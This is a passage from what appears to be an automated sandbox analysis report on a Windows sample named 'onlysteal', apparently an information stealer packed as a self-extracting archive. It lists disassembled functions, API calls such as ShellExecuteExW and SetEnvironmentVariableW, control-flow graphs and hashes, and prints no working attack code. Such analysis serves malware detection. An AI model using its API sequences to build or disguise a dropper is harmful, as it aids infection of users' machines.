                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$<$$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$$
                                      • API String ID: 986293930-4008444337
                                      • Opcode ID: 24a73bb7123ffc6388f5898a653e32c63262ef6e4c499b103ae084faea89d323
                                      • Instruction ID: df09ecb926b5db3dbe131945a946b006dcbff758822d07b00c1da5b0d1e7d9a7
                                      • Opcode Fuzzy Hash: 24a73bb7123ffc6388f5898a653e32c63262ef6e4c499b103ae084faea89d323
                                      • Instruction Fuzzy Hash: B1E165B2910119AADF29DFA4DD85EEE77BCAF05350F5040A6FA09E3050EB749F948F60
                                      Function 0023DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0023DA70
                                      • _wcschr.LIBVCRUNTIME ref: 0023DA91
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0023DAAC
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 00241B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0023BAE9,00000000,?,?,?,00010438), ref: 00241BA0
                                      • _wcslen.LIBCMT ref: 0023DDE9
                                      • __fprintf_l.LIBCMT ref: 0023DF1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9&
                                      • API String ID: 557298264-1855252971
                                      • Opcode ID: 00e5589986237ca6d18b8ad4678fe9359573aa3399af0b6982a5ca8d47776672
                                      • Instruction ID: b0804d5d4f80797be76bf3d941aa437add8d73ef8b46b13ae402d72ce18a4b80
                                      • Opcode Fuzzy Hash: 00e5589986237ca6d18b8ad4678fe9359573aa3399af0b6982a5ca8d47776672
                                      • Instruction Fuzzy Hash: F532F2B1920219DBCF28EF68D842BEA77A9FF04700F41055AF945A7281E7B1DDA9CF50
                                      Function 0024D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      • GetDlgItem.USER32(00000068,0028FCB8), ref: 0024D4E8
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,0024AF07,00000001,?,?,0024B7B9,0026506C,0028FCB8,0028FCB8,00001000,00000000,00000000), ref: 0024D510
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024D51B
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024D529
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D53F
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0024D559
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D59D
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0024D5AB
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D5BA
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D5E1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002643F4), ref: 0024D5F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 4c63f86d96d3a676e8f90c881bb34e6407954c4a56d737965cc6927c87f16b98
                                      • Instruction ID: 69b37caf6f823b4d40ae5d2a99bffda76ea8a829d9a08bc255fd97522fbda208
                                      • Opcode Fuzzy Hash: 4c63f86d96d3a676e8f90c881bb34e6407954c4a56d737965cc6927c87f16b98
                                      • Instruction Fuzzy Hash: 2231C271145342BFE301DF20EC4EFAB7FACEB86708F000519F551D61A0DB659A148B76
                                      Function 0024D78F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 836 24d78f-24d7a7 call 24ec50 839 24d7ad-24d7b9 call 253e13 836->839 840 24d9e8-24d9f0 836->840 839->840 843 24d7bf-24d7e7 call 24fff0 839->843 846 24d7f1-24d7ff 843->846 847 24d7e9 843->847 848 24d801-24d804 846->848 849 24d812-24d818 846->849 847->846 850 24d808-24d80e 848->850 851 24d85b-24d85e 849->851 852 24d837-24d844 850->852 853 24d810 850->853 851->850 854 24d860-24d866 851->854 858 24d9c0-24d9c2 852->858 859 24d84a-24d84e 852->859 857 24d822-24d82c 853->857 855 24d86d-24d86f 854->855 856 24d868-24d86b 854->856 860 24d882-24d898 call 23b92d 855->860 861 24d871-24d878 855->861 856->855 856->860 862 24d82e 857->862 863 24d81a-24d820 857->863 864 24d9c6 858->864 859->864 865 24d854-24d859 859->865 872 24d8b1-24d8bc call 23a231 860->872 873 24d89a-24d8a7 call 241fbb 860->873 861->860 866 24d87a 861->866 862->852 863->857 868 24d830-24d833 863->868 870 24d9cf 864->870 865->851 866->860 868->852 871 24d9d6-24d9d8 870->871 874 24d9e7 871->874 875 24d9da-24d9dc 871->875 882 24d8be-24d8d5 call 23b6c4 872->882 883 24d8d9-24d8e6 ShellExecuteExW 872->883 873->872 881 24d8a9 873->881 874->840 875->874 878 24d9de-24d9e1 ShowWindow 875->878 878->874 881->872 882->883 883->874 884 24d8ec-24d8f9 883->884 887 24d90c-24d90e 884->887 888 24d8fb-24d902 884->888 890 24d925-24d944 call 24dc3b 887->890 891 24d910-24d919 887->891 888->887 889 24d904-24d90a 888->889 889->887 892 24d97b-24d987 CloseHandle 889->892 890->892 905 24d946-24d94e 890->905 891->890 899 24d91b-24d923 ShowWindow 891->899 893 24d998-24d9a6 892->893 894 24d989-24d996 call 241fbb 892->894 893->871 898 24d9a8-24d9aa 893->898 894->870 894->893 898->871 902 24d9ac-24d9b2 898->902 899->890 902->871 904 24d9b4-24d9be 902->904 904->871 905->892 906 24d950-24d961 GetExitCodeProcess 905->906 906->892 907 24d963-24d96d 906->907 908 24d974 907->908 909 24d96f 907->909 908->892 909->908
                                      APIs
                                      • _wcslen.LIBCMT ref: 0024D7AE
                                      • ShellExecuteExW.SHELL32(?), ref: 0024D8DE
                                      • ShowWindow.USER32(?,00000000), ref: 0024D91D
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0024D959
                                      • CloseHandle.KERNEL32(?), ref: 0024D97F
                                      • ShowWindow.USER32(?,00000001), ref: 0024D9E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                      • String ID: .exe$.inf$h$$r$
                                      • API String ID: 36480843-546698491
                                      • Opcode ID: efd38176652de2ea3908cf403af963d26a9b1097044f84856fa7da697ba0656a
                                      • Instruction ID: ac39db456828017e266c06864f0605b5e83363e371b3abdc336eeb5e2079063b
                                      • Opcode Fuzzy Hash: efd38176652de2ea3908cf403af963d26a9b1097044f84856fa7da697ba0656a
                                      • Instruction Fuzzy Hash: B85104744243829ADB359F24A848BBBBBE4AF81744F04081EF9C5D71A1D7B1CEA5CB12
                                      Function 0025A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 910 25a95b-25a974 911 25a976-25a986 call 25ef4c 910->911 912 25a98a-25a98f 910->912 911->912 919 25a988 911->919 914 25a991-25a999 912->914 915 25a99c-25a9c0 MultiByteToWideChar 912->915 914->915 917 25a9c6-25a9d2 915->917 918 25ab53-25ab66 call 24fbbc 915->918 920 25a9d4-25a9e5 917->920 921 25aa26 917->921 919->912 924 25aa04-25aa15 call 258e06 920->924 925 25a9e7-25a9f6 call 262010 920->925 923 25aa28-25aa2a 921->923 928 25aa30-25aa43 MultiByteToWideChar 923->928 929 25ab48 923->929 924->929 935 25aa1b 924->935 925->929 938 25a9fc-25aa02 925->938 928->929 932 25aa49-25aa5b call 25af6c 928->932 933 25ab4a-25ab51 call 25abc3 929->933 940 25aa60-25aa64 932->940 933->918 939 25aa21-25aa24 935->939 938->939 939->923 940->929 942 25aa6a-25aa71 940->942 943 25aa73-25aa78 942->943 944 25aaab-25aab7 942->944 943->933 947 25aa7e-25aa80 943->947 945 25ab03 944->945 946 25aab9-25aaca 944->946 950 25ab05-25ab07 945->950 948 25aae5-25aaf6 call 258e06 946->948 949 25aacc-25aadb call 262010 946->949 947->929 951 25aa86-25aaa0 call 25af6c 947->951 954 25ab41-25ab47 call 25abc3 948->954 966 25aaf8 948->966 949->954 964 25aadd-25aae3 949->964 950->954 955 25ab09-25ab22 call 25af6c 950->955 951->933 963 25aaa6 951->963 954->929 955->954 967 25ab24-25ab2b 955->967 963->929 968 25aafe-25ab01 964->968 966->968 969 25ab67-25ab6d 967->969 970 25ab2d-25ab2e 967->970 968->950 971 25ab2f-25ab3f WideCharToMultiByte 969->971 970->971 971->954 972 25ab6f-25ab76 call 25abc3 971->972 972->933
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00255695,00255695,?,?,?,0025ABAC,00000001,00000001,2DE85006), ref: 0025A9B5
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0025ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0025AA3B
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0025AB35
                                      • __freea.LIBCMT ref: 0025AB42
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • __freea.LIBCMT ref: 0025AB4B
                                      • __freea.LIBCMT ref: 0025AB70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: a9958cfde3475bed11ddbacdf8443e28dcd7049dbd33a14d9a7961199524f35e
                                      • Instruction ID: bd6ae17ddb7ffa400246bd6ef11ff904d34a9dc9432ff42bb6a2ccf0ed88d3b0
                                      • Opcode Fuzzy Hash: a9958cfde3475bed11ddbacdf8443e28dcd7049dbd33a14d9a7961199524f35e
                                      • Instruction Fuzzy Hash: F9511372A20213ABDB258F64CC43EBBB7ABEB60715F154728FC04D6140DB70DC68C69A
                                      Function 00253B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 975 253b72-253b7c 976 253bee-253bf1 975->976 977 253bf3 976->977 978 253b7e-253b8c 976->978 979 253bf5-253bf9 977->979 980 253b95-253bb1 LoadLibraryExW 978->980 981 253b8e-253b91 978->981 982 253bb3-253bbc GetLastError 980->982 983 253bfa-253c00 980->983 984 253b93 981->984 985 253c09-253c0b 981->985 987 253be6-253be9 982->987 988 253bbe-253bd3 call 256088 982->988 983->985 989 253c02-253c03 FreeLibrary 983->989 986 253beb 984->986 985->979 986->976 987->986 988->987 992 253bd5-253be4 LoadLibraryExW 988->992 989->985 992->983 992->987
                                      APIs
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00253C35,?,?,00292088,00000000,?,00253D60,00000004,InitializeCriticalSectionEx,00266394,InitializeCriticalSectionEx,00000000), ref: 00253C03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID: api-ms-
                                      • API String ID: 3664257935-2084034818
                                      • Opcode ID: afb2d8f9c597c311b0c61277769ab2f8cbe67c133ee21b019afd78a5a7b61569
                                      • Instruction ID: 1f014b59f94b2246a0d5cb459648165676efc87836bb545e860dc4a327942ee9
                                      • Opcode Fuzzy Hash: afb2d8f9c597c311b0c61277769ab2f8cbe67c133ee21b019afd78a5a7b61569
                                      • Instruction Fuzzy Hash: BF110A31A25222ABCB21CF689C4975D77A49F017F6F151111EC11FB290D7B1EF1886D8
                                      Function 002398E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 993 2398e0-239901 call 24ec50 996 239903-239906 993->996 997 23990c 993->997 996->997 998 239908-23990a 996->998 999 23990e-23991f 997->999 998->999 1000 239921 999->1000 1001 239927-239931 999->1001 1000->1001 1002 239933 1001->1002 1003 239936-239943 call 236edb 1001->1003 1002->1003 1006 239945 1003->1006 1007 23994b-23996a CreateFileW 1003->1007 1006->1007 1008 2399bb-2399bf 1007->1008 1009 23996c-23998e GetLastError call 23bb03 1007->1009 1010 2399c3-2399c6 1008->1010 1013 2399c8-2399cd 1009->1013 1015 239990-2399b3 CreateFileW GetLastError 1009->1015 1012 2399d9-2399de 1010->1012 1010->1013 1017 2399e0-2399e3 1012->1017 1018 2399ff-239a10 1012->1018 1013->1012 1016 2399cf 1013->1016 1015->1010 1019 2399b5-2399b9 1015->1019 1016->1012 1017->1018 1020 2399e5-2399f9 SetFileTime 1017->1020 1021 239a12-239a2a call 240602 1018->1021 1022 239a2e-239a39 1018->1022 1019->1010 1020->1018 1021->1022
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00237760,?,00000005,?,00000011), ref: 0023995F
                                      • GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0023996C
                                      • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00237760,?,00000005,?), ref: 002399A2
                                      • GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399AA
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: 0afcfb7e554d48a81863a3fb2fed27c87e97491adf29c98516871ce0575da5e2
                                      • Instruction ID: 387b35ff639a3b79e5156218888806e8d8939f5927ea7ee7e8fa397d585e78b8
                                      • Opcode Fuzzy Hash: 0afcfb7e554d48a81863a3fb2fed27c87e97491adf29c98516871ce0575da5e2
                                      • Instruction Fuzzy Hash: 5E3108705547466FE730DF24CC85BDABB94BB06320F100719F5A1961D1D7F4A9A8CB91
                                      Function 0024B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1052 24b568-24b581 PeekMessageW 1053 24b583-24b597 GetMessageW 1052->1053 1054 24b5bc-24b5be 1052->1054 1055 24b5a8-24b5b6 TranslateMessage DispatchMessageW 1053->1055 1056 24b599-24b5a6 IsDialogMessageW 1053->1056 1055->1054 1056->1054 1056->1055
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                      • IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                      • TranslateMessage.USER32(?), ref: 0024B5AC
                                      • DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 8c07912393d67937931e2f4552ca6dd208110ba8492d426053e301c885bf79a1
                                      • Instruction ID: 9ffe7f3b52c0bb8d9a47690d7798c66f2e5c1ab9d36f625313e4643250967a39
                                      • Opcode Fuzzy Hash: 8c07912393d67937931e2f4552ca6dd208110ba8492d426053e301c885bf79a1
                                      • Instruction Fuzzy Hash: 94F0D071A0122AAB8B20DFE5EC4DDDBBFBCEE053917404415B519D2010EB74D605CBB0
                                      Function 0024ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1057 24abab-24abca GetClassNameW 1058 24abf2-24abf4 1057->1058 1059 24abcc-24abe1 call 241fbb 1057->1059 1061 24abf6-24abf9 SHAutoComplete 1058->1061 1062 24abff-24ac01 1058->1062 1064 24abf1 1059->1064 1065 24abe3-24abef FindWindowExW 1059->1065 1061->1062 1064->1058 1065->1064
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 0024ABC2
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0024ABF9
                                        • Part of subcall function 00241FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0023C116,00000000,.exe,?,?,00000800,?,?,?,00248E3C), ref: 00241FD1
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0024ABE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: ec67ea112e5b9f2ffb5edcc140c77a078014d814ee925e16bcd197ba520bb08a
                                      • Instruction ID: 99d9bf884b017d2030dd67a6167f6639f7c227859db18d137a973cc956d0bafa
                                      • Opcode Fuzzy Hash: ec67ea112e5b9f2ffb5edcc140c77a078014d814ee925e16bcd197ba520bb08a
                                      • Instruction Fuzzy Hash: 66F0A73276122977DB309B24AC0AFDF76ACDF56B40F494012BA05F71C0D760DE9585B6
                                      Function 0024AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • OleInitialize.OLE32(00000000), ref: 0024AC2F
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0024AC66
                                      • SHGetMalloc.SHELL32(00278438), ref: 0024AC70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 4f8a3059376d70296337475b4e06acd950a03a32e2682be781e16d3671b24537
                                      • Instruction ID: a73fcfe82167380582b31ae2822db243d45d841793893e3d0e2e4bbfa77d6598
                                      • Opcode Fuzzy Hash: 4f8a3059376d70296337475b4e06acd950a03a32e2682be781e16d3671b24537
                                      • Instruction Fuzzy Hash: 34F044B1900209ABCB10AFA9E8499AFFBFCEF84700F00405AA805A2201CBB456458FA0
                                      Function 0024DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1070 24dbde-24dc09 call 24ec50 SetEnvironmentVariableW call 240371 1074 24dc0e-24dc12 1070->1074 1075 24dc14-24dc18 1074->1075 1076 24dc36-24dc38 1074->1076 1077 24dc21-24dc28 call 24048d 1075->1077 1080 24dc1a-24dc20 1077->1080 1081 24dc2a-24dc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0024DBF4
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0024DC30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
